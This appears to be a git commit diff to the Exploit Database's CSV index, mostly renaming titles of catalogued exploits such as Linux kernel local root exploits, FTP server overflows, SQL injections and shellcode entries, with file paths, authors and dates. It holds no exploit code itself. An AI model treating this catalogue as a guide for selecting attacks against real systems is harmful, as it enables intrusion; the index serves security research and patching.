DB: 2016-07-23

3 new exploits

Mandrake Linux 8.2 - /usr/mail Local Exploit
/usr/mail (Mandrake Linux 8.2) - Local Exploit

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2 - (TCP/IP Weakness) Exploit
Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit

CDRecord's ReadCD - Local Root Privileges
CDRecord's ReadCD - Local Root Exploit

NetBSD FTPd / tnftpd Remote Stack Overflow PoC
NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC

Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)

SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities
SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities
NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept
NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept
NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept
NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)

Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit
Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit

NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)
NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit

NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)
NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit

FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service
FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service

FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow

NetBSD 1.x TalkD User Validation
NetBSD 1.x TalkD - User Validation

FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition
FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition

Linux Kernel 2.4 - execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition PoC

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)
Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)

NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow
NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow

OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service
OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service

Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption
Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption

Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities
Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities

Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root
Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit

NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow
NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow

VSAT Sailor 900 - Remote Exploit

Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation

Apple OS X Entitlements Rootpipe Privilege Escalation
Apple OS X Entitlements - 'Rootpipe' Privilege Escalation

OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)

OS X Install.framework suid root Runner Binary Privilege Escalation
OS X Install.framework - suid root Runner Binary Privilege Escalation

Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit

Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)
Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)

Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit

Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation
Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation

Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)
Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)

Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)

Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)
Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution
This commit is contained in:
Offensive Security 2016-07-23 05:07:15 +00:00
parent 789febc361
commit be496c36bc
6 changed files with 475 additions and 45 deletions

View file

@ -38,7 +38,7 @@ id,file,description,date,author,platform,type,port
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0
40,platforms/linux/local/40.pl,"/usr/mail (Mandrake Linux 8.2) - Local Exploit",2003-06-10,anonymous,linux,local,0
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0
143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
@ -225,7 +225,7 @@ id,file,description,date,author,platform,type,port
234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0
236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21
240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
@ -413,7 +413,7 @@ id,file,description,date,author,platform,type,port
465,platforms/php/webapps/465.pl,"PHP-Nuke SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0
466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0
469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0
469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Exploit",2004-09-19,"Max Vozeler",linux,local,0
470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0
471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66
472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0
@ -2550,7 +2550,7 @@ id,file,description,date,author,platform,type,port
2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0
2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0
2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0
2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0
2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0
@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port
9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
@ -9004,7 +9004,7 @@ id,file,description,date,author,platform,type,port
9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
@ -9358,7 +9358,7 @@ id,file,description,date,author,platform,type,port
9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0
9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow / null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0
@ -10962,7 +10962,7 @@ id,file,description,date,author,platform,type,port
12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0
12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload",2010-04-01,indoushka,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF",2010-04-02,"pratul agrawal",php,webapps,0
12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0
@ -11539,8 +11539,8 @@ id,file,description,date,author,platform,type,port
12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0
12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload",2010-05-19,DigitALL,php,webapps,0
@ -12595,7 +12595,7 @@ id,file,description,date,author,platform,type,port
14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - (XSS/CSRF) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)",2010-07-12,anonymous,linux,local,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@ -13803,7 +13803,7 @@ id,file,description,date,author,platform,type,port
15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0
15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0
15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
@ -13822,7 +13822,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
@ -15703,7 +15703,7 @@ id,file,description,date,author,platform,type,port
18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0
18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0
18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,Metasploit,windows,local,0
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
@ -16650,7 +16650,7 @@ id,file,description,date,author,platform,type,port
19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0
19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0
19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0
19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)",1998-06-27,Gutierrez,netbsd_x86,local,0
19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0
19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
@ -16814,7 +16814,7 @@ id,file,description,date,author,platform,type,port
19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0",1999-08-05,"Stefan Lauda",hardware,remote,0
19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS",1999-08-08,Narr0w,windows,dos,0
19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0
19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)",1999-08-09,"Ross Harvey",multiple,local,0
19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0
19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0
@ -17254,7 +17254,7 @@ id,file,description,date,author,platform,type,port
19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote,0
19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction",2000-05-04,kingpin,windows,local,0
19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow",2000-03-01,Joey__,windows,remote,0
19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
